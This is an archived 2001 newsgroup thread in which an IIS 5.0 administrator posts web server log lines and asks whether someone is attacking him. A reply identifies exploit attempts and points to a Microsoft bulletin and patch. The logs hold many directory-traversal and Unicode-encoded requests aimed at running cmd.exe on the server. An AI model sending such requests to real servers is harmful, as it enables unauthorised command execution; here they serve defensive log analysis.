[HELP]: Log analisys

[Nuno Silva]

Hi i'm getting this type of lines in my iis 5.0 log files, can any one
explain me what i'm thinking it is?
This is someone trying to enter in my server?
Thanks

2001-05-08 08:05:34 212.164.32.40 - 192.168.1.252 80 GET
/scripts/../../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 08:05:34 212.164.32.40 - 192.168.1.252 80 GET
/scripts/..\../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 08:05:36 212.164.32.40 - 192.168.1.252 80 GET
/scripts/..ﾁ%pc../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 08:05:36 212.164.32.40 - 192.168.1.252 80 GET
/scripts/..ﾀ%9v../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 08:05:37 212.164.32.40 - 192.168.1.252 80 GET
/scripts/..ﾀ%qf../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 08:05:37 212.164.32.40 - 192.168.1.252 80 GET
/scripts/..ﾁ%8s../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 08:05:39 212.164.32.40 - 192.168.1.252 80 GET
/scripts/..ﾁ ../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 08:05:42 212.164.32.40 - 192.168.1.252 80 GET
/scripts/..\../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 08:05:46 212.164.32.40 - 192.168.1.252 80 GET
/scripts/..o../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 08:05:46 212.164.32.40 - 192.168.1.252 80 GET
/scripts/../../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 08:05:48 212.164.32.40 - 192.168.1.252 80 GET
/scripts/..�?ｯ../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 08:05:48 212.164.32.40 - 192.168.1.252 80 GET
/scripts/..�??ｯ../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 08:05:49 212.164.32.40 - 192.168.1.252 80 GET
/scripts/..�???ｯ../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 08:05:49 212.164.32.40 - 192.168.1.252 80 GET
/msadc/../../../../../../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 16:41:06 193.204.165.51 - 192.168.1.252 80 GET
/scripts/../../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 16:41:06 193.204.165.51 - 192.168.1.252 80 GET
/scripts/..\../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 16:41:07 193.204.165.51 - 192.168.1.252 80 GET
/scripts/..ﾁ%pc../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 16:41:07 193.204.165.51 - 192.168.1.252 80 GET
/scripts/..ﾀ%9v../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 16:41:12 193.204.165.51 - 192.168.1.252 80 GET
/scripts/..ﾀ%qf../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 16:41:12 193.204.165.51 - 192.168.1.252 80 GET
/scripts/..ﾁ%8s../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 16:41:12 193.204.165.51 - 192.168.1.252 80 GET
/scripts/..ﾁ ../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 16:41:13 193.204.165.51 - 192.168.1.252 80 GET
/scripts/..\../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 16:41:13 193.204.165.51 - 192.168.1.252 80 GET
/scripts/..o../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 16:41:14 193.204.165.51 - 192.168.1.252 80 GET
/scripts/../../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 16:41:14 193.204.165.51 - 192.168.1.252 80 GET
/scripts/..�?ｯ../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 16:41:14 193.204.165.51 - 192.168.1.252 80 GET
/scripts/..�??ｯ../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 16:41:16 193.204.165.51 - 192.168.1.252 80 GET
/scripts/..�???ｯ../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 16:41:16 193.204.165.51 - 192.168.1.252 80 GET
/msadc/../../../../../../winnt/system32/cmd.exe /c+dir 302 -

2001-05-12 19:27:32 202.100.96.69 - 192.168.1.252 80 GET
/winnt/system32/cmd.exe /c+dir 302 -
2001-05-12 19:27:37 202.100.96.69 - 192.168.1.252 80 GET
/winnt/system32/cmd.exe /c+dir 302 -
2001-05-12 19:27:37 202.100.96.69 - 192.168.1.252 80 GET
/scripts/..ﾁ%pc../winnt/system32/cmd.exe /c+dir 302 -
2001-05-12 19:27:38 202.100.96.69 - 192.168.1.252 80 GET
/scripts/..ﾀ%9v../winnt/system32/cmd.exe /c+dir 302 -
2001-05-12 19:27:38 202.100.96.69 - 192.168.1.252 80 GET
/scripts/..ﾀ%qf../winnt/system32/cmd.exe /c+dir 302 -
2001-05-12 19:27:40 202.100.96.69 - 192.168.1.252 80 GET
/scripts/..ﾁ%8s../winnt/system32/cmd.exe /c+dir 302 -
2001-05-12 19:27:40 202.100.96.69 - 192.168.1.252 80 GET
/scripts/..ﾁ ../winnt/system32/cmd.exe /c+dir 302 -
2001-05-12 19:27:44 202.100.96.69 - 192.168.1.252 80 GET
/winnt/system32/cmd.exe /c+dir 302 -
2001-05-12 19:27:44 202.100.96.69 - 192.168.1.252 80 GET
/scripts/..o../winnt/system32/cmd.exe /c+dir 302 -
2001-05-12 19:27:46 202.100.96.69 - 192.168.1.252 80 GET
/winnt/system32/cmd.exe /c+dir 302 -
2001-05-12 19:27:50 202.100.96.69 - 192.168.1.252 80 GET
/scripts/..�?ｯ../winnt/system32/cmd.exe /c+dir 302 -
2001-05-12 19:27:50 202.100.96.69 - 192.168.1.252 80 GET
/scripts/..�??ｯ../winnt/system32/cmd.exe /c+dir 302 -
2001-05-12 19:27:51 202.100.96.69 - 192.168.1.252 80 GET
/scripts/..�???ｯ../winnt/system32/cmd.exe /c+dir 302 -
2001-05-12 19:27:51 202.100.96.69 - 192.168.1.252 80 GET
/winnt/system32/cmd.exe /c+dir 302 -
2001-05-12 19:39:40 195.22.0.20 - 192.168.1.252 80 GET / - 302
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
2001-05-12 22:47:19 216.35.116.90 - 192.168.1.252 80 GET /robots.txt - 302
Mozilla/3.0+(Slurp/si;+sl...@inktomi.com;+http://www.inktomi.com/slurp.html)

2001-05-15 09:57:31 195.235.161.237 - 192.168.1.252 80 GET
/winnt/system32/cmd.exe /c+dir 302 -
2001-05-15 09:57:42 195.235.161.237 - 192.168.1.252 80 GET
/winnt/system32/cmd.exe /c+dir 302 -
2001-05-15 09:57:53 195.235.161.237 - 192.168.1.252 80 GET
/scripts/..ﾁ%pc../winnt/system32/cmd.exe /c+dir 302 -
2001-05-15 09:57:54 195.235.161.237 - 192.168.1.252 80 GET
/scripts/..ﾀ%9v../winnt/system32/cmd.exe /c+dir 302 -
2001-05-15 09:57:55 195.235.161.237 - 192.168.1.252 80 GET
/scripts/..ﾀ%qf../winnt/system32/cmd.exe /c+dir 302 -
2001-05-15 09:57:55 195.235.161.237 - 192.168.1.252 80 GET
/scripts/..ﾁ%8s../winnt/system32/cmd.exe /c+dir 302 -
2001-05-15 09:57:57 195.235.161.237 - 192.168.1.252 80 GET
/scripts/..ﾁ ../winnt/system32/cmd.exe /c+dir 302 -
2001-05-15 09:58:02 195.235.161.237 - 192.168.1.252 80 GET
/winnt/system32/cmd.exe /c+dir 302 -

[Chris Crowe]

[This followup was posted to microsoft.public.inetserver.iis and a copy
was sent to the cited author.]

In article <BWcN6.3585$AN.61...@newsserver.ip.pt>,
nsi...@greatplains.pt says...

Yes someone is trying to exploit your machine.

See this Microsoft security Bulletin .
http://www.microsoft.com/technet/security/bulletin/MS01-026.asp.

There is a new patch that fix's almost all security holes in IIS4 and 5
refeeered in the above article.

--

Chris Crowe

Looking for IIS information then come to www.iisfaq.com
The home of the unofficial IIS FAQ....

ADSI Administration scripts - we have them - all free!!

[Nuno Silva]

ok thanks, for coincidence or not I just download this patch and applied in
the morning

many thanks

"Chris Crowe" <ch...@iisfaq.com> wrote in message
news:MPG.157024f7c...@news.microsoft.com...